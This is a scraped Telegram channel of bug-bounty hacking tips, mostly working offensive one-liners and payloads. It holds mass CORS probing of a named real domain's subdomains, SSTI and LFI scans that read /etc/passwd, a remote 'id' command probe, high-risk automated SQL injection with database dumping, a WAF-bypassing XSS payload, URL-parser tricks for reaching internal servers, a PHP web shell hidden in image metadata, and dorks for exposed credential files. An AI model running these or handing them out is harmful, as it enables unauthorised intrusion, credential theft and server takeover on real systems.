ExploitQuest
6.85K subscribers
37 photos
9 videos
2 files
41 links
Download Telegram
This media is not supported in your browser
VIEW IN TELEGRAM
πŸ”₯4πŸ₯°4❀1
πŸ”₯6❀3
ExploitQuest
Photo
πŸ“Ž Finding web servers vulnerable to CORS attacks

The following one-liner can determine if any subdomain of the target domain is vulnerable to cross-origin resource sharing (CORS) attacks:


assetfinder fitbit.com | httpx -threads 300 -follow-redirects -silent | rush -j200 'curl -m5 -s -I -H "Origin: evil.com" {} | [[ $(grep -c "evil.com") -gt 0 ]] && printf "\n\033[0;32m[VUL TO CORS] \033[0m{}"' 2>/dev/null

For this combination to work, please install the following tools:

https://github.com/tomnomnom/assetfinder

https://github.com/projectdiscovery/httpx

https://github.com/shenwei356/rush

Here's what the team does in detail:

Collect subdomains of a target domain (e.g.
fitbit.com ). Identifies real (live) subdomains and creates a list of URLs. Checks access to each URL and includes the Origin: evil.com HTTP header in each request. Looks for " evil.com " in response headers. If found, outputs the information to the terminal.

If we see something like the screenshot below, it means that the sites in question have misconfigured their CORS policy and could potentially expose sensitive information to any arbitrary third-party website. This information includes cookies, API keys, CSRF tokens, and other sensitive data.

For more information about CORS attacks, check out PortSwigger's CORS security guide :

https://portswigger.net/web-security/cors

#web #cors
πŸ₯°9❀5πŸ‘4
πŸ”— Automate the search for Server-side Template Injection (SSTI)

First, save these payloads to a file payloads.txt (you can add your own):


check-ssti{{7*7}}[[1*1]]
check-ssti{{7*7}}
check-ssti{{7*'7'}}
check-ssti<%= 7 * 7 %>
check-ssti${7*7}
check-ssti${{7*7}}
check-ssti@(7*7)
check-ssti#{7*7}
check-ssti#{ 7 * 7 }


Then, using waybackurls we get the endpoints of our site and select the most suitable ones for SSTI using gf:

echo target.com | waybackurls | gf ssti | anew -q ssti.txt

Create a list of endpoints with the payload as a parameter:

cat payloads.txt | while read -r line; do cat ssti.txt | qsreplace "$line" | anew -q sstipatterns.txt; done

We run the command to check the server's response for the presence of SSTI:

cat sstipatterns.txt | xargs -P 50 -I@ bash -c "curl -s -L @ | grep \"check-ssti49\" && echo -e \"[VULNERABLE] - @ \n \"" | grep "VULNERABLE"

#web #ssti
πŸ₯°8πŸ‘3❀2πŸ‘2
πŸ“‘ XSS in applications with automatic error correction

If you see that a web application is trying to guess or fix your search query (e.g. in the search bar) and has a WAF on top of it, use misspelled words to perform XSS and bypass the WAF:


<scrpt>confrm()</scrpt>


Will be corrected to:

<script>confirm()</script>


The above behavior is often observed in PHP web applications using pspell_suggest().

#web #xss #waf
❀9πŸ”₯1
πŸ“‚ Quick website check for simple LFI

We find the list of words to output /etc/passwd and place it in the payloads.txt file.

Then, using waybackurls we get the endpoints of our site and select the most suitable ones for LFI using gf :


echo target.com | waybackurls | gf lfi | anew -q lfi.txt

Create a list of endpoints with the payload as a parameter using qsreplace :

cat payloads.txt | while read -r line; do cat lfi.txt | qsreplace "$line" | anew -q lfipatterns.txt; done

We run the command to check the server's response for LFI:

cat lfipatterns.txt | xargs -P 50 -I@ bash -c "curl -s -L @ | grep \"root:\" && echo -e \"[VULNERABLE] - @ \n \"" | grep "VULNERABLE"

#web #lfi
πŸ”₯21❀4πŸ‘1
I want to see the interaction on the posts to know if you are interested or not ☺️.
πŸ‘22πŸ”₯9❀4πŸ₯°3πŸ‘2
There is a topic called Inconsistency.
Which happens between the checker functions and the libraries sending the http request.
And that's how both the checker functions and the libraries are safe.
But when they work together, they become vulnerable.
For example, in this URL:


https://admin@site.com
username: admin
Host: site.com


But you are this one:

https://site.com@admin.ir@moha
.tld

What is Host?


It doesn't matter at all what it is now.
It's important to say that, for example, parse_url in PHP and curl are the same thing, but this is not the case.
For example, you:

curl -v http://user@127.0.0.1:80@www.google.com/x.php

Host = 127.0.0.1


But parse_url calls this same URL google.com !

And this way, when we use curl, we can access the x.php file, which is on an internal server and does not have a public IP address.
πŸ‘3❀1
Search for Sensitive files from Wayback

waybackurls domain.com| grep - -color -E "1.xls | \\. xml | \\.xlsx | \\.json | \\. pdf | \\.sql | \\. doc| \\.docx | \\. pptx| \\.txt| \\.zip| \\.tar.gz| \\.tgz| \\.bak| \\.7z| \\.rar"
πŸ‘4πŸ”₯4
One liner to find RCE

cat targets.txt | httpx -path "/cgi-bin/admin.cgi?Command=sysCommand&Cmd=id" -nc -ports 80,443,8080,8443 -mr "uid=" -silent
❀6πŸ”₯3
One liner to find sql Injection

cat subs.txt | (gau || hakrawler || katana || waybckurls) | grep "=" | dedupe | anew tmp-sqli.txt && sqlmap -m tmp-sqli.txt --batch --random-agent --level 5 --risk 3 --dbs &&
for i in $(cat tmp-sqli.txt); do ghauri -u "$i" --level 3 --dbs --current-db --batch --confirm; done

#sql
❀7πŸ‘4πŸ”₯2
Finding Hidden Parameter & Potential XSS with Arjun + KXSS

arjun -q -u target -oT arjun && cat arjun | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | kxss

#xss
❀12πŸ‘2πŸ”₯2
XSS from javascript hidden params

assetfinder  target.com | gau | egrep -v '(.css|.svg)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars"

#xss
πŸ”₯8❀3πŸ‘3
SQL maps generator

Link site

#sql
❀20πŸ”₯2πŸ‘1
Bypass File Upload Filtering

In image:


exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>'
shell.jpg
mv shell.jpg shell.php.jpg
πŸ”₯6❀5
Time based SQL Injection using waybackurls

waybackurls TARGET.COM | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt
πŸ”₯6
FileFetcher is a Python tool that extracts and filters URLs from archived Wayback Machine data based on file types like .pdf, .zip, .sql, and more. It checks the availability of each URL, saving valid ones with a 200 OK response to a text file, ideal for research or web scraping.



https://github.com/shivangmauryaa/FileFetcher.git
πŸ‘5πŸ”₯1
Top 25 JavaScript path files used to store sensitive information in Web Application

01. /js/config.js
02. /js/credentials.js
03. /js/secrets.js
04. /js/keys.js
05. /js/password.js
06. /js/api_keys.js
07. /js/auth_tokens.js
08. /js/access_tokens.js
09. /js/sessions.js
10. /js/authorization.js
11. /js/encryption.js
12. /js/certificates.js
13. /js/ssl_keys.js
14. /js/passphrases.js
15. /js/policies.js
16. /js/permissions.js
17. /js/privileges.js
18. /js/hashes.js
19. /js/salts.js
20. /js/nonces.js
21. /js/signatures.js
22. /js/digests.js
23. /js/tokens.js
24. /js/cookies.js
25. /js/topsecr3tdonotlook.js
πŸ‘2❀1πŸ”₯1
ExploitQuest
Top 25 JavaScript path files used to store sensitive information in Web Application 01. /js/config.js 02. /js/credentials.js 03. /js/secrets.js 04. /js/keys.js 05. /js/password.js 06. /js/api_keys.js 07. /js/auth_tokens.js 08. /js/access_tokens.js 09. /js/sessions.js…
Dork :


intitle:"index of" inurl:"/js/" ("config.js" | "credentials.js" | "secrets.js" | "keys.js" | "password.js" | "api_keys.js" | "auth_tokens.js" | "access_tokens.js" | "sessions.js" | "authorization.js" | "encryption.js" | "certificates.js" | "ssl_keys.js" | "passphrases.js" | "policies.js" | "permissions.js" | "privileges.js" | "hashes.js" | "salts.js" | "nonces.js" | "signatures.js" | "digests.js" | "tokens.js" | "cookies.js" | "topsecr3tdonotlook.js")
❀4πŸ‘1
This media is not supported in your browser
VIEW IN TELEGRAM
- Are you ready, kids?
- Yes, !
- I can't hear you!
- Yes sir, !

- Whooo... who is burning out in front of the screen?
- BUG-HUNTER!
- A top hacker in hookah smoke?
- BUG-HUNTER!
- Who breaks the scope always and everywhere?
- BUG-HUNTER!
- Do you like to party in trendy merch?
- BUG-HUNTER!
- Skilled and dexterous, not a fan of discussions?
- BUG-HUNTER!
- Looking for crits without any illusions?
- BUG-HUNTER!
- Who writes a full report to the vendor?
- BUG-HUNTER!
- Sparing no effort during the nights of the narpolet?
- BUG-HUNTER!
- Who wants the maximum bounty payouts?
- BUG-HUNTER!
- All thanks to your brilliant ingenuity?
- BUG-HUN-TER! BUG-HUN-TER! BUG-HUN-TER! BUG-HUN-TEEEER!
😁8πŸ‘3🫑3